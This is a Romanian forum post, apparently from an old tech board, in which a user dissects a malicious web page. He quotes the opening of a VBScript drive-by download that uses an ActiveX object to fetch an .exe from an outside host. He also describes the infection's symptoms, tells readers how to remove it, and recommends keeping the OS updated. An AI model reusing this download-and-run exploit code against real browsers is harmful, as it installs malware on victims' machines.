Shocker
Membru Gold
 Din: localhost
Inregistrat: acum 18 ani
|
|
Pagina respectiva contine un script de genul:
Code:
<script language="VBScript">
on error resume next
dl = "http://www.vnzw.com/host2.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
........blabla nu are rost sa pun tot scriptul :rotfl: |
Dupa cum vedeti, ia un .EXE de pe net, care mai tarziu va fi rulat. .EXE-ul acela este de vina in legatura cu modul in care se comporta calculatorul dupa accesarea link`ului (mass-uri trimise aiurea pe YM!, ctrl+alt+delete dezactivat, schimbare pagina home de la IE, etc)
Incearca sa il inchizi de la procese (parca are numele svchost32.exe si sa il stergi din folder-ul temp al browser-ului tau)
Eu am XP Service Pack 2 mai nou (build 2600.xpsp.060411-1541), iar cand am intrat pe link-ul respectiv prima data am fost avertizat de antivirus ca e virusat. A 2-a oara am am dezactivat AV-ul, am copiat script-ul respectiv pe comp, am modificat .EXE-ul respectiv cu ceva infensiv si am deschis .html`ul respectiv. Nu s-a intamplat absolut nimic  Asa ca... copii... luati-va intotdeauna cele mai noi update-uri de la OS-ul folosit 
Modificat de Shocker (acum 18 ani)
_______________________________________ ShockingSoft is back Freakz only Comics of the day
|
|